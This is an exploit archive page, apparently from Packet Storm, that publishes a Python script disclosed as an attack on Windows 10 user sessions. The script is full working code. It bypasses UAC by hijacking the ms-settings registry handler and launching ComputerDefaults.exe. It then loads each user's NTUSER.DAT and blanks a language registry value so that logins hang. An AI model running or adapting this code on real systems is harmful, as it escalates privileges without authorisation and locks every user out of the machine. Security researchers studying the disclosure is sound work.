exploit the possibilities

Microsoft Windows 10 User Sessions Stuck

Microsoft Windows 10 User Sessions Stuck
Posted Oct 30, 2018
Authored by Fabien Dromas

This exploit modifies a windows language registry key which causes some windows binaries to stick, including login which makes the session unusable. The key is in HKCU and can be modified without admin rights, but with a bypass UAC, all user sessions can be paralyzed by using reg.exe and user's NTUSER.DAT.

tags | exploit, registry
systems | windows
MD5 | 3e4fd43ec5cd4d8013e6761b559ecdf7

Microsoft Windows 10 User Sessions Stuck

Change Mirror Download
#!/usr/bin/env python
#
# Exploit Title: Windows 10 All Users Session Stuck
# Date: 2018-10-24
# Exploit Author: Fabien DROMAS - Security consultant @ Synetis <fabien.dromas[at]synetis[dot]com>
# Twitter: st0rnpentest
#
# After microsoft's refusal to consider the issue as a security problem, I disclose the script
# Vendor Homepage: www.microsoft.com
# Version: Version 10.0.17134.345
# Tested on: Windows 10 pro Version 10.0.17134.345
#

from os import listdir, system, path
from ctypes import *
import _winreg

def create_reg_key(key, value):
try:
_winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command')
registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command', 0, _winreg.KEY_WRITE)
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
_winreg.CloseKey(registry_key)
except WindowsError:
raise

def exec_bypass_uac(cmd):
try:
create_reg_key('DelegateExecute', '')
create_reg_key(None, cmd)
except WindowsError:
raise

def bypass_uac():
try:
current=path.dirname(path.realpath(__file__)) + '\\' + __file__
cmd="C:\windows\System32\cmd.exe /k c:\python27\python %s" %current
exec_bypass_uac(cmd)
system(r'C:\windows\system32\ComputerDefaults.exe')
return 1
except WindowsError:
sys.exit(1)

def modify_reg_key(key, value):
try:
registry_key=_winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Control Panel\Desktop\LanguageConfiguration', 0, _winreg.KEY_WRITE)
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
_winreg.CloseKey(registry_key)
except WindowsError:
raise


def modify_reg_key_Others(key, value):
try:
registry_key = _winreg.OpenKey(_winreg.HKEY_USERS, 'w00t\Control Panel\Desktop\LanguageConfiguration', 0, _winreg.KEY_WRITE)
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
_winreg.CloseKey(registry_key)
except WindowsError:
raise

if __name__ == '__main__':
try:
sys32="c:\\windows\\system32\\"
users="c:\\users\\"
exclude=["Public", "desktop.ini", "All Users"]

# Modify all users
if windll.Shell32.IsUserAnAdmin():
for i in listdir(users):
if i not in exclude:
system("reg.exe LOAD HKU\w00t "+users+i+"\NTUSER.DAT")
modify_reg_key_Others('', '')
system("reg.exe UNLOAD HKU\w00t")

# Modify current user
modify_reg_key('', '')
else:
bypass_uac()
except WindowsError:
raise
Login or Register to add favorites

File Archive:

August 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    3 Files
  • 2
    Aug 2nd
    2 Files
  • 3
    Aug 3rd
    32 Files
  • 4
    Aug 4th
    22 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    6 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close